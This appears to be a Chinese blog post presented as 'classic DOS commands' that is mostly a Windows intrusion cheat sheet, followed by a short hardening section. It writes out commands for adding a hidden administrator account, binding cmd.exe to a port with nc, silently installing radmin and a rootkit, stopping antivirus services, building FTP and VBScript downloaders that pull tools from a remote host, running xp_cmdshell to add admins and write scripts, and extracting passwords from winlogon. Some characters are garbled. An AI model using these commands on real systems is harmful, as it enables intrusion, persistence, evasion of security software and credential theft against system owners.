一些经典DOS命令

(1) 运行 cmd 命令
l       通过在“运行”菜单中执行 cmd 或者 command 指令。
l       通过程序的附件执行“命令提示符”
l       直接在反弹的 shell 中(一般是远程控制软件中)
说明:在有些情况下,管理员对 cmd 命令进行了限制,这就需要更换 cmd.exe 为其它一个名字,或者从本地上传一个文件上去。
(2) 创建目录: mkdir test
(3) 更换当前路径: cd  test
(4) 生成文件: netstat �Can >netlog.txt
(5) 查看文件属性: dir /a /s
(6) 查找指定网络连接: netstat �Can |find “80” /3389
(7) 给文件加上 / 还原属性: attrib �Ch-s-r-a
(8) 创建新文件夹 : mkdir hacker
(9) 移动文件 netlog.txt hacker 文件夹
l       move netlog.txt c:hacker\
l       move netlog.txt c:\test\hacker\
10 )添加新管理员 hacker
net user hacker wshacker /add
net localgroup administrators hacker /add
net user hacker
net user hacker wshakcer!!
11 )使用 nc 命令
l       监听命令
netstat �Can |find “8080”
nc -vv -l -p 8080 / nc -vv -l -p 8080
nc -l  -p port>log.txt
l       程序定向
nc -l -p 5277 -t -e cmd.exe
在对方机器上运行 , 使其成为一台 telnet 服务器 .
l       扫描对方端口
nc -v -ip port
eg nc -v 172.16.81.1 80
l       扫描对方 tcp 端口
nc -v -z ip port -port
l       扫描对方 udp 端口
nc -v -z -u ip port-port
l       上传文件
本地机器上执行 :nc -v -n ip port<x:\svr.exe
远程机器上执行 :nc -v -l -p port >y:\svr.exe
12 )查看系统时间: net time  net view /net session /net use
13 )使用 at 命令:
at 查看当前所有列表
at \\ip 时间 命令
at 9:01 “net user aspnet  wshakcer /add ”
net time
说明该命令一般是配合 net time 命令使用
14 )查看远程终端连接情况: query user /quser
15 )注销远程终端用户: logoff 1/2/3
16 )命令模式安装 radmin 远程控制软件
前提:将 radmin 的三个服务端文件( admdll.dll raddrv.dll r_server.exe )放入一个文件夹,并且已经获得了被入侵机器的管理员密码。
net use \\ip\admin$ “ 密码 ” /u administrator
copy *.*  \\192.168.45.219\admin$\system32\
psexec \\192.168.45.219  -u user �Cp password cmd
然后执行命令:
netstat -an |find "4899"
net stop r_server
r_server.exe /pass:wshacker /port:4899 /save  /silence
r_server.exe /install /silence
net start r_server
net start r_server
netstat -an |find "4899"
netstat -an |find "4899"
17 )安装 rootkit
ntboot.exe ntboot.dll 拷入系统目录,然后执行 ntboot �Cinstall 命令, rootkit 80 端口有效,尤其对提供 web 服务的端口。
客户端调用比较简单:
cli->ip 地址 ->80 端口
18 )停止和启动服务。
Net stop /net start  服务名称
以下命令停止杀毒软件
net stop "Symantec AntiVirus"
net stop "Symantec AntiVirus Definition Watcher"
net stop "Symantec Event Manager"
net stop "Symantec Settings Manager"
net stop "System Event Notification"
19 )获取网络配置情况: ipconfig /all
20 )使用脚本下载
echo open 192.168.45.219>b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get radmin.exe>>b (可以是一系列的可执行文件)
echo bye >>b
ftp -s:b
del b
echo open 192.168.45.219 >1
echo user bin bin >>1
echo bin >>1
echo get wt.exe >>1
echo bye >>1
ftp -n -s:1
del 1
21 dl.vbe
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe
cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
(22). iget.vbe
net stop "RsRavMon Service"
net stop "Rising Personal Firewall Service"
net stop " Rising Process Communication Center "
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
dir iget.vbs
cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll
cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll
cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe
cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll
cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe
cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe
cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe
23 )使用软件下载
wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]
wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]
wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]
mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll
mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe
mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe
mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe
24 )在网站上复制文件
copy c:\tmp\*.exe c:\winnt\system32\inetsrv\data\
使用网页木马的文件上传功能。
25 )使用 SQL Server 2000 xp_cmdshell
exec master.dbo.xp_cmdshell   命令 ’ -- 执行命令
use master �C 使用哪一个数据
exec master.dbo.xp_cmdshell  'net user aspnet wshacker /add'
exec master.dbo.xp_cmdshell  'net localgroup administrators asp2net /add' 将脚本通过网页提交
exec xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs'
exec xp_cmdshell 'echo Set WshShell = Wscript.CreateObject("Wscript.Shell")>>c:\read.vbs'
exec xp_cmdshell 'echo spa=WshShell.Environment("process")("windir") >>c:\read.vbs'
exec xp_cmdshell 'echo set fil =fso1.opentextfile(spa & "\system32\aa.txt") >>c:\read.vbs'
exec xp_cmdshell 'echo  do while not fil.atendofstream>>c:\read.vbs'
exec xp_cmdshell 'echo  nr=fil.readline>>c:\read.vbs'
exec xp_cmdshell 'echo  if left(nr,4)="Path" then>>c:\read.vbs'
exec xp_cmdshell 'echo  pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)>>c:\read.vbs'
exec xp_cmdshell 'echo  exit do>>c:\read.vbs'
exec xp_cmdshell 'echo  end if>>c:\read.vbs'
exec xp_cmdshell 'echo  loop>>c:\read.vbs'
exec xp_cmdshell 'echo  set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true)>>c:\read.vbs'
exec xp_cmdshell 'echo  fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>">>c:\read.vbs '
 (26) 查找用户的密码 :
l       使用 pulist.exe 查看用户的进程 , 找到 winlogon PID.
l       然后运行 findpass.exe 域名 ( 机器名 ) 用户名 PID
例如 : findpass.exe a administrator 204
mt �Cfindpass
[url]ftp://192.168.99.254[/url]
(27) 使用 ps
l       显示所有进程
ps /a
dir *.exe>exeback.txt & dir *.dll>dllback.txt
ps.exe /a /m >nowdlls.txt
28 )压缩文件
rar a -r myrar d:\sinba
29 )计算机管理控制台程序
compmgmt.exe
dcomcnfg.exe 组件服务程序
devmgmt.exe 设备管理器程序
fsmgmt.exe 共享文件管理
lusrmgr.msc 本地用户和组
eventvwr.msc 日志管理器
ht 文件
ht -fku
ht -key  mima
ht -ps
htk -fku
htk -key 218123409252
htk -ps
htk -pslist
htk -pass
htk -fpass
htk -pss 192.168.1.6
htk -s 192.168.1.6 -show -run
htk -share -add 211.72.212.81 admin$
htk -share -add 211.72.50.10  admin$
安全防护
(1) 查看运行服务与端口
fport /p
2 )查看开放的文件及其进程
handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])
 handle -p iexplore handle
3 )进行登陆等时间的审计( gpedit
4 )严格安全日志的管理(应用程序日志、系统日志、安全时间日志)
严格限制%SystemRoot%\system32\config 目录访问权限,仅限管理员访问
eventvwr.msc 更改日志文件的默认大小
5 )去掉默认文件共享
HKey_Local_Machine\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
新建 DWORD 键“AutoShareServer”值为0
net share
6)加密用户所在文件的临时目录temp
C:\Documents and Settings\<username>\Local Settings
7 )清楚页面文件
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management ClearPageFileAtShutdown 键值设置为 1
8 )严格控制应用程序的访问权限
使用 win2000 资源 AppSec

本文出自 “simeon技术专栏” 博客,谢绝转载!

你可能感兴趣的:(职场,休闲,DOS 命令)